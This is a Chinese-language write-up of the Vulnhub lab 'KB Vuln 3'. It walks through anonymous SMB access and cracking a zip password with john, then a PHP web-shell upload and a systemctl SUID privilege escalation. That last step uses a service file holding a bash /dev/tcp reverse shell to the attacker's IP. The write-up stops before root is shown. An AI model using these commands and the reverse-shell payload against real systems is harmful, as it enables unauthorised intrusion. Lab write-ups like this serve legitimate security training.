KB Vuln 3
作者:jason huawen
识别目标主机IP地址
- ─(kali㉿kali)-[~/Vulnhub/KBVuln3]
- └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
- Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
-
- 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
- 192.168.56.100 08:00:27:69:ef:ae 1 60 PCS Systemtechnik GmbH
- 192.168.56.254 08:00:27:38:ea:a0 1 60 PCS Systemtechnik GmbH
复制代码 利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254
NMAP扫描
- ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
- └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
- Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-11 19:35 EDT
- Nmap scan report for bogon (192.168.56.254)
- Host is up (0.00042s latency).
- Not shown: 65531 closed tcp ports (reset)
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- | 2048 cb04f0363f42f73ace2ff54ce0abfe17 (RSA)
- | 256 6106df25d5e1e347fe1394fd740c8500 (ECDSA)
- |_ 256 5089b6b43a0b6e63121040e2c4f93533 (ED25519)
- 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
- |_http-server-header: Apache/2.4.29 (Ubuntu)
- |_http-title: Site doesn't have a title (text/html).
- 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
- 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
- MAC Address: 08:00:27:38:EA:A0 (Oracle VirtualBox virtual NIC)
- Service Info: Host: KB-SERVER; OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Host script results:
- |_nbstat: NetBIOS name: KB-SERVER, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
- | smb2-time:
- | date: 2023-04-11T23:35:58
- |_ start_date: N/A
- | smb2-security-mode:
- | 311:
- |_ Message signing enabled but not required
- | smb-security-mode:
- | account_used: guest
- | authentication_level: user
- | challenge_response: supported
- |_ message_signing: disabled (dangerous, but default)
- | smb-os-discovery:
- | OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
- | Computer name: kb-server
- | NetBIOS computer name: KB-SERVER\x00
- | Domain name: \x00
- | FQDN: kb-server
- |_ System time: 2023-04-11T23:35:58+00:00
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds
复制代码 NMAP扫描结果表明目标主机有4个开放端口:22(ssh)、80(http)、139/445(samba)
获得Shell
- ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
- └─$ smbclient -L 192.168.56.254
- Password for [WORKGROUP\kali]:
- Anonymous login successful
- Sharename Type Comment
- --------- ---- -------
- Files Disk HACK ME
- IPC$ IPC IPC Service (Samba 4.7.6-Ubuntu)
- Reconnecting with SMB1 for workgroup listing.
- Anonymous login successful
- Server Comment
- --------- -------
- Workgroup Master
- --------- -------
- WORKGROUP KB-SERVER
-
- ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
- └─$ smbclient //192.168.56.254/Files
- Password for [WORKGROUP\kali]:
- Anonymous login successful
- Try "help" to get a list of possible commands.
- smb: \> ls
- . D 0 Fri Oct 2 14:11:49 2020
- .. D 0 Fri Oct 2 13:12:00 2020
- website.zip N 38936127 Fri Oct 2 14:11:41 2020
- 14380040 blocks of size 1024. 9540188 blocks available
- smb: \> get website.zip
- getting file \website.zip of size 38936127 as website.zip (121094.1 KiloBytes/sec) (average 121094.1 KiloBytes/sec)
- smb: \> pwd
- Current directory is \\192.168.56.254\Files\
- smb: \> cd /var
- cd \var\: NT_STATUS_OBJECT_NAME_NOT_FOUND
- smb: \> quit
复制代码 通过smbclient工具连接目标主机的smb服务,将共享目录中的文件下载到Kali Linux。- ─(kali㉿kali)-[~/Vulnhub/KBVuln3]
- └─$ enum4linux 192.168.56.254
- [+] Enumerating users using SID S-1-22-1 and logon username '', password ''
-
- S-1-22-1-1000 Unix User\heisenberg (Local User)
复制代码 enum4linux工具识别出目标主机存在用户名heisenberg- ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
- └─$ ls -alh
- total 38M
- drwxr-xr-x 2 kali kali 4.0K Apr 11 19:38 .
- drwxr-xr-x 89 kali kali 4.0K Apr 11 19:34 ..
- -rw-r--r-- 1 root root 1.8K Apr 11 19:35 nmap_full_scan
- -rw-r--r-- 1 kali kali 38M Apr 11 19:38 website.zip
-
- ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
- └─$ unzip website.zip
- Archive: website.zip
- [website.zip] README.txt password:
复制代码 website.zip被加密,可以用ziptojohn转换为哈希值,然后利用John the ripper工具进行破解- ─$ zip2john website.zip > hashes
- └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes --force
- Using default input encoding: UTF-8
- Loaded 1 password hash (PKZIP [32/64])
- Will run 2 OpenMP threads
- Press 'q' or Ctrl-C to abort, almost any other key for status
- porchman (website.zip)
- 1g 0:00:00:00 DONE (2023-04-11 19:40) 1.886g/s 8617Kp/s 8617Kc/s 8617KC/s porno852..poppy670
- Use the "--show" option to display all of the cracked passwords reliably
- Session completed.
复制代码- ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
- └─$ cat README.txt
- Hi Heisenberg! Your website is activated. --> kb.vuln
- Username : admin
- Password : jesse
- Have a good day !
复制代码 应该是网站的用户名密码,暂时放在一边。- ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
- └─$ nikto -h http://192.168.56.254
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 192.168.56.254
- + Target Hostname: 192.168.56.254
- + Target Port: 80
- + Start Time: 2023-04-11 19:44:48 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: Apache/2.4.29 (Ubuntu)
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + No CGI Directories found (use '-C all' to force check all possible dirs)
- + Server may leak inodes via ETags, header found with file /, inode: 2240, size: 5b0b40b8dd680, mtime: gzip
- + Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
- + Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
- + OSVDB-3233: /icons/README: Apache default file found.
- + 7915 requests: 0 error(s) and 7 item(s) reported on remote host
- + End Time: 2023-04-11 19:45:44 (GMT-4) (56 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
复制代码 根据README.txt文件,是不是要将kb.vuln添加到/etc/hosts文件中?- ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
- └─$ sudo vim /etc/hosts
-
- ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
- └─$ cat /etc/hosts
- 127.0.0.1 localhost
- 127.0.1.1 kali
- ::1 localhost ip6-localhost ip6-loopback
- ff02::1 ip6-allnodes
- ff02::2 ip6-allrouters
- 192.168.56.254 kb.vuln
复制代码 刷新页面,此时返回的页面就不是page not found,其中有Login链接,尝试用前面的Readme.txt中的用户名密码登录,可以成功登录,接下来的目标是将shell.php上传,上传文件没有任何限制,但是文件放在什么位置呢?
从页面源代码:- div ><img title="/Sunrise2/People.jpg" src="https://www.cnblogs.com/files/images/Sunrise2/People.jpg" alt="/Sunrise2/People.jpg" width="545" height="270">
复制代码 可以猜测文件位置为:需要将shell.php上传到images/backgrounds目录下,即可访问
http://kb.vuln/files/images/backgrounds/shell.php- ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
- └─$ sudo nc -nlvp 5555
- listening on [any] 5555 ...
- connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 38966
- Linux kb-server 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
- 00:04:41 up 34 min, 0 users, load average: 0.86, 0.42, 0.55
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- /bin/sh: 0: can't access tty; job control turned off
- $ which python
- /usr/bin/python
- $ python -c 'import pty;pty.spawn("/bin/bash")'
- www-data@kb-server:/$ cd /home
- cd /home
- www-data@kb-server:/home$ ls -alh
- ls -alh
- total 12K
- drwxr-xr-x 3 root root 4.0K Oct 2 2020 .
- drwxr-xr-x 24 root root 4.0K Oct 2 2020 ..
- drwxr-xr-x 4 heisenberg heisenberg 4.0K Oct 2 2020 heisenberg
- www-data@kb-server:/home$ cd heisengerg
- cd heisengerg
- bash: cd: heisengerg: No such file or directory
- www-data@kb-server:/home$ cd heisenberg
- cd heisenberg
- www-data@kb-server:/home/heisenberg$ ls -alh
- ls -alh
- total 32K
- drwxr-xr-x 4 heisenberg heisenberg 4.0K Oct 2 2020 .
- drwxr-xr-x 3 root root 4.0K Oct 2 2020 ..
- -rw-r--r-- 1 heisenberg heisenberg 220 Apr 4 2018 .bash_logout
- -rw-r--r-- 1 heisenberg heisenberg 3.7K Apr 4 2018 .bashrc
- drwx------ 2 heisenberg heisenberg 4.0K Oct 2 2020 .cache
- drwx------ 3 heisenberg heisenberg 4.0K Oct 2 2020 .gnupg
- -rw-r--r-- 1 heisenberg heisenberg 807 Apr 4 2018 .profile
- -rw-r--r-- 1 heisenberg heisenberg 0 Oct 2 2020 .sudo_as_admin_successful
- -rw-r--r-- 1 root root 33 Oct 2 2020 user.txt
- www-data@kb-server:/home/heisenberg$ cat user.txt
- cat user.txt
- 6346c6d19751f1a3195f1e4b4b609544
- www-data@kb-server:/home/heisenberg$
复制代码 从而得到user flag
提权
- www-data@kb-server:/var/www/html/sitemagic$ find / -perm -4000 -type f 2>/dev/null
- <l/sitemagic$ find / -perm -4000 -type f 2>/dev/null
- /usr/lib/snapd/snap-confine
- /usr/lib/policykit-1/polkit-agent-helper-1
- /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
- /usr/lib/eject/dmcrypt-get-device
- /usr/lib/openssh/ssh-keysign
- /usr/lib/dbus-1.0/dbus-daemon-launch-helper
- /usr/bin/at
- /usr/bin/sudo
- /usr/bin/newgrp
- /usr/bin/newuidmap
- /usr/bin/chfn
- /usr/bin/pkexec
- /usr/bin/gpasswd
- /usr/bin/chsh
- /usr/bin/newgidmap
- /usr/bin/passwd
- /usr/bin/traceroute6.iputils
- /bin/systemctl
- /bin/umount
- /bin/su
- /bin/mount
- /bin/fusermount
- /bin/ping
复制代码 可以利用systemctl的SUID位进行提权,参考GTFOBINS网站给出的参考步骤进行提权- sudo install -m =xs $(which systemctl) .
- TF=$(mktemp).service
- echo '[Service]
- Type=oneshot
- ExecStart=/bin/sh -c "id > /tmp/output"
- [Install]
- WantedBy=multi-user.target' > $TF
- ./systemctl link $TF
- ./systemctl enable --now $TF
复制代码 因此接下来编写一个service文件,Spawn一个新的反弹shell- ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
- └─$ cat shell.service
- [Service]
- Type=oneshot
- ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.206/6666 0>&1'
- [Install]
- WantedBy=multi-user.target
复制代码 将shell.service文件上传到目标主机/tmp目录- www-data@kb-server:/tmp$ wget http://192.168.56.206:8000/shell.service
- wget http://192.168.56.206:8000/shell.service
- --2023-04-12 00:31:31-- http://192.168.56.206:8000/shell.service
- Connecting to 192.168.56.206:8000... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 132 [application/octet-stream]
- Saving to: 'shell.service'
- shell.service 100%[===================>] 132 --.-KB/s in 0s
- 2023-04-12 00:31:31 (46.4 MB/s) - 'shell.service' saved [132/132]
复制代码 将shell.service 移动到网站目录- www-data@kb-server:/var/www/html/sitemagic$ mv /tmp/shell.service .
- mv /tmp/shell.service .
复制代码 然后创建服务- www-data@kb-server:/var/www/html/sitemagic$ systemctl link /var/www/html/sitemagic/shell2.service
复制代码 启动服务- www-data@kb-server:/var/www/html/sitemagic$ systemctl start shell2.service
复制代码 [code][/code]
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |